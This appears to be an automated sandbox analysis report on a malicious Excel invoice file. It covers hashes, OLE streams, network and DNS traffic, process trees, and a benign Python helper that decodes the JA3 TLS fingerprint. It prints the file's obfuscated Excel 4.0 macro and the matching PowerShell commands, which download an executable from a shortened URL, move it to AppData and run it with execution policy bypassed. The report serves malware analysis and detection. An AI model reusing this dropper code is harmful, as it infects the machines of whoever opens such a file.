                                                                                                                                            SSDEEP:48:BZpvhioOevqDYB1ZNZevhioOevqDYB1ZXJfGO9fGO3fGORZZV:BZlhiN4qDo1ZNZShiN4qDo1ZXJDpDZP
                                                                                                                                            MD5:42C698D1C9F97EADA970FFAC78815433
                                                                                                                                            SHA1:FE167C8DF2EF91061CE1079B3E6D3B14C4EAC905
                                                                                                                                            SHA-256:13562E631E552FEEB7EC894CB91629285DD787C2EA5E12CB55DA6A50ADB2D950
                                                                                                                                            SHA-512:5E44CEF8D61DCF537F4F1E8EE5D033B09984B634A742B213165829517A3AEBED256E1B7C912886EEBE6A273C5A7EC723E1BCBABBCE535E6CF83A1597343D16CF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20201119100444..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 581804 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZhqUH1O','vx.exe')..Process ID: 3060..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201119100445..**********************..PS>(nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZhqUH1O','vx.exe')..**********************..Windows PowerShell transcript start..Start time: 20201119100520..Username: computer\user..RunAs User: computer\user..Configurati

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dexter MORGAN, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Oct 25 18:24:14 2020, Last Saved Time/Date: Sat Nov 14 12:53:19 2020, Security: 1
                                                                                                                                            Entropy (8bit):6.722113426938609
                                                                                                                                            TrID:
                                                                                                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                            File name:Proforma Invoice.xls
                                                                                                                                            File size:76288
                                                                                                                                            MD5:55db711144ff4a35faf58d982e7cf727
                                                                                                                                            SHA1:ea7b59dde9f0600915069dec66f8410f25cb66fd
                                                                                                                                            SHA256:6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
                                                                                                                                            SHA512:92e99e23ef71f4b1b9e3f6733ca16d51a2e44a777581c6a4a9b35b4c3574620cbff37ba02052bd7932f75acd2b70a2750f4c53c0d87db75e8a10c4aa1cf4192a
                                                                                                                                            SSDEEP:1536:/pqnSGiysRchNXHfA1MiWhZFGkElMFAAr7IQmSb4wIE7zp0RhBv1hQz7rTb16mL:/4nSGiysRchNXHfA1MiWhZFGkElMFAAv

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                            Static OLE Info

                                                                                                                                            General

                                                                                                                                            Document Type:OLE
                                                                                                                                            Number of OLE Files:1

                                                                                                                                            OLE File "Proforma Invoice.xls"

                                                                                                                                            Indicators

                                                                                                                                            Has Summary Info:True
                                                                                                                                            Application Name:Microsoft Excel
                                                                                                                                            Encrypted Document:False
                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                            Contains Workbook/Book Stream:True
                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                            Flash Objects Count:
                                                                                                                                            Contains VBA Macros:True

                                                                                                                                            Summary

                                                                                                                                            Code Page:1252
                                                                                                                                            Author:Dexter MORGAN
                                                                                                                                            Last Saved By:Administrator
                                                                                                                                            Create Time:2020-10-25 18:24:14
                                                                                                                                            Last Saved Time:2020-11-14 12:53:19
                                                                                                                                            Creating Application:Microsoft Excel
                                                                                                                                            Security:1

                                                                                                                                            Document Summary

                                                                                                                                            Document Code Page:1252
                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                            Company:
                                                                                                                                            Contains Dirty Links:False
                                                                                                                                            Shared Document:False
                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                            Application Version:983040

                                                                                                                                            Streams with VBA

                                                                                                                                            VBA File Name: Feuil1.cls, Stream Size: 977
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Feuil1
                                                                                                                                            VBA File Name:Feuil1.cls
                                                                                                                                            Stream Size:977

                                                                                                                                            VBA Code Keywords

                                                                                                                                            Keyword
                                                                                                                                            VB_Exposed
                                                                                                                                            Attribute
                                                                                                                                            VB_Name
                                                                                                                                            VB_Creatable
                                                                                                                                            VB_PredeclaredId
                                                                                                                                            VB_GlobalNameSpace
                                                                                                                                            VB_Base
                                                                                                                                            VB_Customizable
                                                                                                                                            False
                                                                                                                                            VB_TemplateDerived
                                                                                                                                            VBA Code
                                                                                                                                            VBA File Name: Module1.bas, Stream Size: 1512
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                                                                                                                            VBA File Name:Module1.bas
                                                                                                                                            Stream Size:1512

                                                                                                                                            VBA Code Keywords

                                                                                                                                            Keyword
                                                                                                                                            (strMacro)
                                                                                                                                            strMacro
                                                                                                                                            Attribute
                                                                                                                                            auto_open()
                                                                                                                                            VB_Name
                                                                                                                                            String
                                                                                                                                            VBA Code
                                                                                                                                            VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                            VBA File Name:ThisWorkbook.cls
                                                                                                                                            Stream Size:985

                                                                                                                                            VBA Code Keywords

                                                                                                                                            Keyword
                                                                                                                                            False
                                                                                                                                            VB_Exposed
                                                                                                                                            Attribute
                                                                                                                                            VB_Name
                                                                                                                                            VB_Creatable
                                                                                                                                            "ThisWorkbook"
                                                                                                                                            VB_PredeclaredId
                                                                                                                                            VB_GlobalNameSpace
                                                                                                                                            VB_Base
                                                                                                                                            VB_Customizable
                                                                                                                                            VB_TemplateDerived
                                                                                                                                            VBA Code

                                                                                                                                            Streams

                                                                                                                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                                                                                                            General
                                                                                                                                            Stream Path:\x1CompObj
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:115
                                                                                                                                            Entropy:4.26356656053
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:..........................F'...Feuille de calcul Microsoft Excel.2003.....Biff8.....Excel.Sheet.8..9.q............
                                                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 296
                                                                                                                                            General
                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:296
                                                                                                                                            Entropy:3.12351939639
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:........................................+,..0...............P.......X.......d.......l.......t.......|.........................................................................................................................................Feuil1.....Macro1...................Feuilles de calcul..
                                                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 224
                                                                                                                                            General
                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:224
                                                                                                                                            Entropy:3.82752718687
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:.................................Oh.....+'..0...............@.......H.......`.......x.........................................................Dexter MORGAN...........Administrator...........Microsoft Excel.@...........@.....W............
                                                                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 61163
                                                                                                                                            General
                                                                                                                                            Stream Path:Workbook
                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                            Stream Size:61163
                                                                                                                                            Entropy:7.20561555755
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:........T8..........................\\.p....Usernistrator B.....a.........=..................ThisWorkbook....................................=.......BT..8.......X
                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 533
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Stream Size:533
                                                                                                                                            Entropy:5.2193098334
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:ID="{00000000-0000-0000-0000-000000000000}"..Document=ThisWorkbook/&H00000000..Document=Feuil1/&H00000000..Module=Module1..HelpFile=""..Name="VBAProject"..HelpContextID="0"..VersionCompatible32="393222000"..CMG="DEDC721D9227232B232B272F272F"..DPB="7371DF88
Stream Path: _VBA_PROJECT_CUR/PROJECTwm
File Type: data
Stream Size: 86
Entropy: 3.21559847503
Base64 Encoded: False
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type: data
Stream Size: 2607
Entropy: 4.00233365281
Base64 Encoded: False
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0
File Type: data
Stream Size: 1136
Entropy: 4.08521227715
Base64 Encoded: False
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1
File Type: data
Stream Size: 74
Entropy: 1.7969826379
Base64 Encoded: False
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2
File Type: data
Stream Size: 84
Entropy: 1.91120509258
Base64 Encoded: False
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3
File Type: data
Stream Size: 103
Entropy: 1.89141813866
Base64 Encoded: False
Stream Path: _VBA_PROJECT_CUR/VBA/dir
File Type: data
Stream Size: 568
Entropy: 6.35089764744
Base64 Encoded: True

Macro 4.0 Code

=ERROR(FALSE; (B100))
=IF(GET.WORKSPACE(19);;CLOSE(TRUE))
=IF(GET.WORKSPACE(42);;CLOSE(TRUE))
=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&"wer^she"&CHAR(108)&CHAR(108)&CHAR(32)&" -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').""Invoke""('"&CHAR(104)&"ttps://cutt.ly/ZhqUH1O','vx.exe')")
=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&"wer^she"&CHAR(108)&CHAR(108)&CHAR(32)&" -w 1 stARt`-slE`Ep 20; Move-Item ""vx.exe"" -Destination ""${enV`:appdata}""")
=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&"wer^she"&CHAR(108)&CHAR(108)&CHAR(32)&" -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe")
=PAUSE()

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Nov 19, 2020 10:05:19.423196077 CET  49731        443        192.168.2.3    104.22.1.232
Nov 19, 2020 10:05:19.445290089 CET  443          49731      104.22.1.232   192.168.2.3
Nov 19, 2020 10:05:19.445456982 CET  49731        443        192.168.2.3    104.22.1.232
Nov 19, 2020 10:05:19.828624010 CET  49731        443        192.168.2.3    104.22.1.232
Nov 19, 2020 10:05:19.850589991 CET  443          49731      104.22.1.232   192.168.2.3
Nov 19, 2020 10:05:19.853207111 CET  443          49731      104.22.1.232   192.168.2.3
Nov 19, 2020 10:05:19.853231907 CET  443          49731      104.22.1.232   192.168.2.3
Nov 19, 2020 10:05:19.853244066 CET  443          49731      104.22.1.232   192.168.2.3
Nov 19, 2020 10:05:19.853368998 CET  49731        443        192.168.2.3    104.22.1.232
Nov 19, 2020 10:05:19.858606100 CET  49731        443        192.168.2.3    104.22.1.232
Nov 19, 2020 10:05:19.880615950 CET  443          49731      104.22.1.232   192.168.2.3
Nov 19, 2020 10:05:19.880635023 CET  443          49731      104.22.1.232   192.168.2.3
Nov 19, 2020 10:05:19.932826042 CET  49731        443        192.168.2.3    104.22.1.232
Nov 19, 2020 10:05:19.947360992 CET  49731        443        192.168.2.3    104.22.1.232
Nov 19, 2020 10:05:19.969451904 CET  443          49731      104.22.1.232   192.168.2.3
Nov 19, 2020 10:05:20.088221073 CET  443          49731      104.22.1.232   192.168.2.3
Nov 19, 2020 10:05:20.088244915 CET  443          49731      104.22.1.232   192.168.2.3
Nov 19, 2020 10:05:20.088350058 CET  49731        443        192.168.2.3    104.22.1.232
Nov 19, 2020 10:05:20.478147030 CET  49737        443        192.168.2.3    202.92.6.10
Nov 19, 2020 10:05:20.794853926 CET  443          49737      202.92.6.10    192.168.2.3
Nov 19, 2020 10:05:20.794959068 CET  49737        443        192.168.2.3    202.92.6.10
Nov 19, 2020 10:05:20.795444012 CET  49737        443        192.168.2.3    202.92.6.10
Nov 19, 2020 10:05:21.111841917 CET  443          49737      202.92.6.10    192.168.2.3
Nov 19, 2020 10:05:21.111855984 CET  443          49737      202.92.6.10    192.168.2.3
Nov 19, 2020 10:05:21.111866951 CET  443          49737      202.92.6.10    192.168.2.3
Nov 19, 2020 10:05:21.111881018 CET  443          49737      202.92.6.10    192.168.2.3
Nov 19, 2020 10:05:21.111973047 CET  49737        443        192.168.2.3    202.92.6.10
Nov 19, 2020 10:05:21.111999035 CET  49737        443        192.168.2.3    202.92.6.10
Nov 19, 2020 10:05:21.126590014 CET  49737        443        192.168.2.3    202.92.6.10
Nov 19, 2020 10:05:23.929683924 CET  49731        443        192.168.2.3    104.22.1.232

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Nov 19, 2020 10:04:05.953275919 CET  58361        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:05.966512918 CET  53           58361      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:07.214572906 CET  63492        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:07.227359056 CET  53           63492      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:08.113843918 CET  60831        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:08.126806021 CET  53           60831      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:11.472129107 CET  60100        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:11.485227108 CET  53           60100      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:15.066941977 CET  53195        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:15.086769104 CET  53           53195      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:15.413388968 CET  50141        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:15.459887028 CET  53           50141      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:16.482712984 CET  50141        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:16.495665073 CET  53           50141      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:17.495503902 CET  50141        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:17.508913994 CET  53           50141      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:19.506192923 CET  50141        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:19.519124985 CET  53           50141      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:23.522773027 CET  50141        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:23.543329954 CET  53           50141      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:29.095933914 CET  53023        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:29.108159065 CET  53           53023      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:30.409176111 CET  49563        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:30.422230959 CET  53           49563      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:31.814671993 CET  51352        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:31.837013960 CET  53           51352      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:31.984318972 CET  59349        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:31.997864962 CET  53           59349      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:35.048734903 CET  57084        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:35.061151981 CET  53           57084      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:36.400150061 CET  58823        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:36.415482998 CET  53           58823      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:37.244415998 CET  57568        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:37.257622004 CET  53           57568      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:38.174010992 CET  50540        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:38.186300993 CET  53           50540      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:38.991889000 CET  54366        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:39.006484985 CET  53           54366      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:39.859208107 CET  53034        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:39.872103930 CET  53           53034      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:40.926212072 CET  57762        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:40.939018965 CET  53           57762      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:41.765012980 CET  55435        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:41.778045893 CET  53           55435      8.8.8.8        192.168.2.3
Nov 19, 2020 10:04:47.454478979 CET  50713        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:04:47.466867924 CET  53           50713      8.8.8.8        192.168.2.3
Nov 19, 2020 10:05:08.217988014 CET  56132        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:05:08.230711937 CET  53           56132      8.8.8.8        192.168.2.3
Nov 19, 2020 10:05:19.187911034 CET  58987        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:05:19.201472044 CET  53           58987      8.8.8.8        192.168.2.3
Nov 19, 2020 10:05:19.361068010 CET  56579        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:05:19.379631042 CET  53           56579      8.8.8.8        192.168.2.3
Nov 19, 2020 10:05:20.146378040 CET  60633        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:05:20.473684072 CET  53           60633      8.8.8.8        192.168.2.3
Nov 19, 2020 10:05:46.049911022 CET  61292        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:05:46.062267065 CET  53           61292      8.8.8.8        192.168.2.3
Nov 19, 2020 10:06:20.421422958 CET  63619        53         192.168.2.3    8.8.8.8
Nov 19, 2020 10:06:20.434407949 CET  53           63619      8.8.8.8        192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:49.051702976 CET6493853192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:49.064717054 CET53649388.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:49.941582918 CET6194653192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:49.955674887 CET53619468.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:50.782866955 CET6491053192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:50.796199083 CET53649108.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:51.700256109 CET5212353192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:51.713793039 CET53521238.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:52.263158083 CET5613053192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:52.276166916 CET53561308.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:53.156972885 CET5633853192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:53.169481993 CET53563388.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:53.920691967 CET5942053192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:53.933777094 CET53594208.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:54.399332047 CET5878453192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:54.412719011 CET53587848.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:54.908641100 CET6397853192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:54.922317982 CET53639788.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:55.211477041 CET6293853192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:55.224694014 CET53629388.8.8.8192.168.2.3

                                                                                                                                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 19, 2020 10:05:19.187911034 CET | 192.168.2.3 | 8.8.8.8 | 0x191d | Standard query (0) | cutt.ly | A (IP address) | IN (0x0001)
Nov 19, 2020 10:05:20.146378040 CET | 192.168.2.3 | 8.8.8.8 | 0xdfd1 | Standard query (0) | shopphongtinh.com | A (IP address) | IN (0x0001)

                                                                                                                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 19, 2020 10:05:19.201472044 CET | 8.8.8.8 | 192.168.2.3 | 0x191d | No error (0) | cutt.ly | (none) | 104.22.1.232 | A (IP address) | IN (0x0001)
Nov 19, 2020 10:05:19.201472044 CET | 8.8.8.8 | 192.168.2.3 | 0x191d | No error (0) | cutt.ly | (none) | 104.22.0.232 | A (IP address) | IN (0x0001)
Nov 19, 2020 10:05:19.201472044 CET | 8.8.8.8 | 192.168.2.3 | 0x191d | No error (0) | cutt.ly | (none) | 172.67.8.238 | A (IP address) | IN (0x0001)
Nov 19, 2020 10:05:20.473684072 CET | 8.8.8.8 | 192.168.2.3 | 0xdfd1 | No error (0) | shopphongtinh.com | (none) | 202.92.6.10 | A (IP address) | IN (0x0001)

                                                                                                                                            HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Nov 19, 2020 10:05:19.853244066 CET | 104.22.1.232 | 443 | 192.168.2.3 | 49731 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad

Certificate chain presented by the server in that session (Subject | Issuer | Not Before | Not After):
CN=www.cutt.ly | CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US | Sat Feb 08 01:00:00 CET 2020 | Thu Apr 08 14:00:00 CEST 2021
CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Nov 02 13:24:33 CET 2017 | Tue Nov 02 13:24:33 CET 2027
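
The JA3 digest in the table is, by definition, the MD5 of the fingerprint string in the column before it. The example below is added here and is not part of the Joe Sandbox report: it recomputes the digest from the listed string and names each value the client offered, using small lookup tables (IANA cipher suite, extension and group registries) that I limited to the numbers in this one fingerprint. A 0x0301 version field with a CBC-only suite list and no TLS 1.3 material is consistent with the default SecurityProtocol of the .NET runtime under Windows PowerShell (TLS 1.0), i.e. the fingerprint identifies the downloader stack, not the payload family, which is why the same JA3 shows up across unrelated malware.

```python
import hashlib
from typing import Dict, List

# Fingerprint string and digest exactly as listed in the HTTPS Packets table.
JA3_STRING = "769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0"
REPORTED_DIGEST = "54328bd36c14bd82ddaa0c04b25ed9ad"

# Lookup tables restricted to the values this fingerprint uses (IANA registries).
TLS_VERSIONS = {769: "TLS 1.0 (0x0301)", 770: "TLS 1.1 (0x0302)", 771: "TLS 1.2 (0x0303)"}
CIPHERS = {
    49162: "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA",
    49161: "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",
    49172: "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",
    49171: "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",
    53: "TLS_RSA_WITH_AES_256_CBC_SHA",
    47: "TLS_RSA_WITH_AES_128_CBC_SHA",
    10: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
}
EXTENSIONS = {0: "server_name", 10: "supported_groups", 11: "ec_point_formats",
              23: "extended_master_secret", 35: "session_ticket", 65281: "renegotiation_info"}
GROUPS = {23: "secp256r1", 24: "secp384r1", 29: "x25519"}
POINT_FORMATS = {0: "uncompressed"}


def ja3_digest(ja3: str) -> str:
    """The JA3 digest is the MD5 of the comma/hyphen-joined fingerprint string."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


def _ints(field: str) -> List[int]:
    # An empty field (e.g. no extensions) is legal and decodes to an empty list.
    return [int(x) for x in field.split("-")] if field else []


def decode_ja3(ja3: str) -> Dict[str, object]:
    """Split the five JA3 fields and name each value; unknown numbers are kept as strings."""
    parts = ja3.split(",")
    if len(parts) != 5:
        raise ValueError("JA3 string must have exactly five comma-separated fields")
    version = int(parts[0])
    ciphers, exts, groups, fmts = (_ints(p) for p in parts[1:])
    cipher_names = [CIPHERS.get(c, str(c)) for c in ciphers]
    return {
        "version": version,
        "version_name": TLS_VERSIONS.get(version, "unknown (0x%04x)" % version),
        "ciphers": cipher_names,
        "extensions": [EXTENSIONS.get(e, str(e)) for e in exts],
        "groups": [GROUPS.get(g, str(g)) for g in groups],
        "point_formats": [POINT_FORMATS.get(f, str(f)) for f in fmts],
        # Triage hints: no AEAD suites plus a 0x0301 version field point at a
        # legacy OS/.NET TLS stack rather than a purpose-built implant client.
        "has_aead_cipher": any("GCM" in n or "CHACHA" in n for n in cipher_names),
        "has_sni": 0 in exts,
    }


def digest_matches_report(ja3: str = JA3_STRING, reported: str = REPORTED_DIGEST) -> bool:
    """True when MD5(fingerprint) equals the digest column of the report."""
    return ja3_digest(ja3) == reported.lower()


if __name__ == "__main__":
    print("recomputed digest:", ja3_digest(JA3_STRING), "matches report:", digest_matches_report())
    for key, value in decode_ja3(JA3_STRING).items():
        print("%-16s %s" % (key, value))
```

Run it against any JA3 string your sensor emits; if `digest_matches_report()` is false for a row in your own logs, the string and the digest were taken from different ClientHellos and the row should not be used for correlation.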

                                                                                                                                            Code Manipulations

                                                                                                                                            Statistics

                                                                                                                                            Behavior

                                                                                                                                            System Behavior

General

Start time: 10:04:13
Start date: 19/11/2020
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0xb30000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:04:18
Start date: 19/11/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Imagebase: 0xbd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:04:18
Start date: 19/11/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Imagebase: 0xbd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:04:18
Start date: 19/11/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:04:18
Start date: 19/11/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Imagebase: 0xbd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:04:18
Start date: 19/11/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:04:19
Start date: 19/11/2020
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Imagebase: 0x12a0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
